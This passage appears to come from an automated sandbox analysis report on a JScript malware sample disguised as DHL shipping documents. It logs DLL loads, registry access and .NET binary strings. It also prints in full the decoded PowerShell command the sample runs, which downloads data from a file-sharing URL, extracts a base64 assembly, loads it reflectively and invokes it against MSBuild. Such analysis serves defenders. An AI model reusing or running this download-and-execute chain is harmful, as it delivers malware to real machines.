                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.resourcesuserresourcedatadnlib.dotnetassemblyrefuserdnlib.dotnetresolveexceptiondnlib.dotnet.emitmethodbodyreaderdnlib.dotnet.resourcesresourcewritermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnet.pdbsymbolreadercreatordnlib.peimagesectionheaderdnlib.dotnet.emitlocallistdnlib.dotnet.writermdtablewriterdnlib.dotnetimdtokenproviderdnlib.dotnet.emitmethodbodyreaderbasednlib.dotnetmethodequalitycomparerdnlib.dotnetmdtokendnlib.dotnettypenameparserdnlib.dotnet.writeriheap source: powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnet.mdstreamheaderdnlib.dotnet.mdtableinfodnlib.dotnetmarshalblobreaderdnlib.dotnetitypeormethoddefmicrosoft.win32.taskschedulermonthlydowtriggerdnlib.dotnet.pdbpdbwritermicrosoft.win32.taskschedulertasksettingsmicrosoft.win32.taskschedulertaskserviceversiondnlib.dotneticodedtokendnlib.dotnet.mdrawencmaprowdnlib.dotnet.writeriwritererrordnlib.dotnetimanagedentrypointdnlib.dotnetassemblylinkedresourcednlib.dotnetcablobparserexceptiondnlib.dotnetassemblyattributesdnlib.dotnet.writeritokencreatordnlib.dotnetassemblyresolveexceptiondnlib.dotnetclassorvaluetypesigdnlib.dotnetmethodsigdnlib.dotnetcmodoptsigdnlib.dotnetimplmapmicrosoft.win32.taskschedulertasktriggertypemicrosoft.win32.taskschedulertaskrightsmicrosoft.win32.taskschedulermonthsoftheyeardnlib.pedllcharacteristicsdnlib.dotnetparamattributesdnlib.dotnet.mdicolumnreadersystem.security.accesscontrolaccesscontrolextensionmicrosoft.win32.taskschedulertaskprincipalprivilegesmicrosoft.win32.taskscheduleridletriggermicrosoft.win32.taskscheduler.fluentweeklytriggerbuilderdnlib.dotnetimplmapuserdnlib.dotnet.writerdummymodulewriterlistenermicrosoft.win32.taskschedulerquicktriggertype source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1microsoft.win32.taskscheduleritaskhandlerstatusdnlib.dotnet.writerchunklistbase`1dnlib.iohomednlib.dotneticustomattributednlib.dotnet.pdb.dssisymunmanagedwriter2dnlib.dotnet.writermaxstackcalculatordnlib.dotnet.pdbpdbdocumentusersmicrosoft.win32.taskscheduler.fluentmonthlytriggerbuilderdnlib.dotnet.writerhotpooldnlib.dotneteventattributesdnlib.dotnet.pdb.dsssymbolreadercreatordnlib.dotnet.writermodulewriterbasemicrosoft.win32.taskschedulerpowershellactionplatformoptiondnlib.dotnet.writerioffsetheap`1dnlib.dotnetclasslayoutuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetinterfacemarshaltypemicrosoft.win32.taskschedulertaskeventlogdnlib.dotnetmarshaltypemicrosoft.win32.taskschedulertaskfolderdnlib.dotnet.resourcesresourcereaderexceptionmicrosoft.win32.taskscheduleractioncollectiondnlib.ioioextensionsdnlib.dotnet.writerchunklist`1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.mddotnetstreamdnlib.dotnetfieldattributesdnlib.dotnetparamdefdnlib.dotnetimemberrefresolverdnlib.dotnet.writerpeheadersdnlib.dotnet.writerwin32resourceschunkmicrosoft.win32.taskschedulernotv1supportedexceptioncronfieldtypednlib.dotnet.writermethodbodychunksdnlib.dotnetcaargumentmicrosoft.win32.taskscheduleritriggeruseriddnlib.dotnetloggereventdnlib.utilsmfunc`3dnlib.dotnetsecurityactiondnlib.dotnet.pdb.dsssymbolwritercreatordnlib.ioibinaryreadermicrosoft.win32.taskschedulersessionstatechangetriggerdnlib.dotnetassemblydefdnlib.dotneticustomattributetypednlib.dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000001.00000002.1873325587.00007FFD995FC000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000001.00000002.1874305719.00007FFD99680000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000001.00000002.1859174041.000001A45F6B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1827359098.000001A457F7C000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  JScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:70512 o:Windows%20Script%20Host f:CreateObject r:");_Stream.Type("2");_Stream.Charset("437");_Stream._00000000();ITextStream.WriteLine(" entry:70531 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:70531 o: f:Open r:undefined");ITextStream.WriteLine(" entry:81790 o:%5Bobject%20Object%5D f:decode a0:%22cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgIiRyaGl6b2NyaW51cyA9ICcjeCMua2VzL21vYy5taWxlenVnI2Vtc2lrLy86c3AjI2gnOyRlbWFzY3VsYXRpb24gPSAkcmhpem9jcmludXMgLXJlcGxhY2UgJyMnLCAndCc7JEVybGVub");ITextStream.WriteLine(" exec:56617 f:");ITextStream.WriteLine(" exit:81790 o:%5Bobject%20Object%5D f:decode r:%22powershell.exe%20-Command%20%22%24rhizocrinus%20%3D%20'%23x%23.kes%2Fmoc.milezug%23emsik%2F%2F%3Asp%23%23h'%3B%24emasculation%20%3D%20%24rhizocrinus%20-replace%20'%23'%2C%20't");IWshShell3._00000000();ITextStream.WriteLine(" entry:81797 o: f:Run a0:%22powershell.exe%20-Command%20%22%24rhizocrinus%20%3D%20'%23x%23.kes%2Fmoc.milezug%23emsik%2F%2F%3Asp%23%23h'%3B%24emasculation%20%3D%20%24rhizocrinus%20-replace%20'%23'%2C%20't'%3B%24Erlenmeyer%20%3");IWshShell3.Run("powershell.exe -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h", "0", "false")
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$rhizocrinus = '#x#.kes/moc.milezug#emsik//:sp##h';$emasculation = $rhizocrinus -replace '#', 't';$Erlenmeyer = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$nonsymmetrical = New-Object System.Net.WebClient;$unturf = $nonsymmetrical.DownloadData($Erlenmeyer);$aspectabund = [System.Text.Encoding]::UTF8.GetString($unturf);$cristiform = '<<BASE64_START>>';$doura = '<<BASE64_END>>';$postmodifier = $aspectabund.IndexOf($cristiform);$propylaeum = $aspectabund.IndexOf($doura);$postmodifier -ge 0 -and $propylaeum -gt $postmodifier;$postmodifier += $cristiform.Length;$thoracici = $propylaeum - $postmodifier;$tattooings = $aspectabund.Substring($postmodifier, $thoracici);$huhus = [System.Convert]::FromBase64String($tattooings);$homotaxic = [System.Reflection.Assembly]::Load($huhus);$nonrehydrated = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($emasculation,'','','','MSBuild','','','','','','','','','',''))"Jump to behavior
                  Source: DHl-Global-Documents.jsString : entropy: 5.7, length: 1410, content: "cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgIiRyaGl6b2NyaW51cy#9ICcjeCMua2VzL21vYy5taWxlenVnI2Vtc2lrLy86c3#jI2g
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD993B0972 push E85E545Dh; ret 1_2_00007FFD993B09F9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD993B752B push ebx; iretd 1_2_00007FFD993B756A
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
